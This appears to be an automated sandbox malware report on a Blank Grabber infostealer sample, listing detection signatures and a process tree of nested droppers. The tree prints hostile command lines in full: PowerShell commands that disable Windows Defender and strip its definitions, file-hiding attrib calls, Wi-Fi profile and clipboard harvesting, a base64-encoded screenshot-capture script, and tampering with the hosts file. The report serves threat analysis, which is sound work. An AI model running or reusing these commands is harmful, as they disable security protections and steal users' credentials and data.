Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QIjBj1l8We.exe

Overview

General Information

Sample name:QIjBj1l8We.exe
renamed because original name is a hash value
Original sample name:48a8ee49651a74a74baca1f7c94729e5.exe
Analysis ID:1460520
MD5:48a8ee49651a74a74baca1f7c94729e5
SHA1:0339e2c61f6cdb9e37ca03f9d97e7811593eba23
SHA256:9ce7950dbd49b8c82b25df40fa94e88830361b8625d2f91214fa7583a346f992
Tags:BlankGrabberexe
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
Yara detected Blank Grabber
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Drops executable to a common third party application directory
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • QIjBj1l8We.exe (PID: 6616 cmdline: "C:\Users\user\Desktop\QIjBj1l8We.exe" MD5: 48A8EE49651A74A74BACA1F7C94729E5)
    • x12.exe (PID: 4504 cmdline: "C:\Users\user\AppData\Local\Temp\x12.exe" MD5: A236344BCC36451B5760C4BF40DF3CDA)
      • x11.exe (PID: 4284 cmdline: "C:\Users\user\AppData\Local\Temp\x11.exe" MD5: 34CB7FCA8CB671327865D0BCF6DE72BC)
        • x10.exe (PID: 6660 cmdline: "C:\Users\user\AppData\Local\Temp\x10.exe" MD5: B93FC536DF3C66E783FCBB9071DB7545)
          • x9.exe (PID: 5236 cmdline: "C:\Users\user\AppData\Local\Temp\x9.exe" MD5: 7E5F18A5C7EB009E54AE4FC6127E864C)
            • x8.exe (PID: 1544 cmdline: "C:\Users\user\AppData\Local\Temp\x8.exe" MD5: DD97AAB085B140B715DD1A52038E3C70)
              • x7.exe (PID: 5660 cmdline: "C:\Users\user\AppData\Local\Temp\x7.exe" MD5: 0E9FEE8861C55C0EBADC5F678FBD8A9A)
                • x6.exe (PID: 5448 cmdline: "C:\Users\user\AppData\Local\Temp\x6.exe" MD5: 61F5D17C10DE6541139134FB7058F88E)
                  • x5.exe (PID: 6708 cmdline: "C:\Users\user\AppData\Local\Temp\x5.exe" MD5: 8DBEE0CB9B7550432DF6BEB4D9EA5CF0)
                    • x4.exe (PID: 3992 cmdline: "C:\Users\user\AppData\Local\Temp\x4.exe" MD5: 609A00E116060457295CE9293E6E3B3E)
                      • CheatLauncherV2.exe (PID: 4080 cmdline: "C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe" MD5: 108590051FAB4871AF861B8B12AD1E96)
                        • DCRatBuild.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: 2EDB71DD3792B6F6A774EDBF67BB78D2)
                          • wscript.exe (PID: 6732 cmdline: "C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
                            • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                              • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                              • fontsessionruntime.exe (PID: 7868 cmdline: "C:\agentInto\fontsessionruntime.exe" MD5: 6CF5F23F1C8CA3BC6342506BAAC300DA)
                        • Built.exe (PID: 6616 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: 68D3EA3AFA53DEDFD3593D140747B932)
                        • SolaraBootstrapper.exe (PID: 744 cmdline: "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" MD5: 6557BD5240397F026E675AFB78544A26)
                          • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Built.exe (PID: 3288 cmdline: "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: 68D3EA3AFA53DEDFD3593D140747B932)
      • cmd.exe (PID: 6220 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7264 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 2484 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7292 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6684 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7336 cmdline: attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 7184 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7328 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7548 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7828 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7812 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7820 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • Conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7304 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7392 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8156 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7580 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7840 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7600 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8276 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8092 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8068 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 2212 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7984 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDAF6.tmp" "c:\Users\user\AppData\Local\Temp\gkfhm5n3\CSCE3FF6834DD6C4DE392BB63A4482876F5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8236 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8436 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8468 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
